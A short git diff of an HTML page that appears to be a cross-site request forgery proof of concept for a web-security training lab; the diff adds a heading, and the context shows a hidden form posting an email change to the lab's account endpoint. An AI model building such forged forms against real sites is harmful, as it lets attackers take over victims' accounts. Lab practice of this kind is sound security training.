--- a/simple-csrf/index.html
+++ b/simple-csrf/index.html
@@ -1,5 +1,6 @@
 <html>
 	<body>
+		<h1>CSRF</h1>
       	<form id="csrf" method="POST" action="https://0aa100f804c18047811302a30034003a.web-security-academy.net/my-account/change-email">
           	<input value="b@b.b" type="hidden" name="email" />
       	</form>
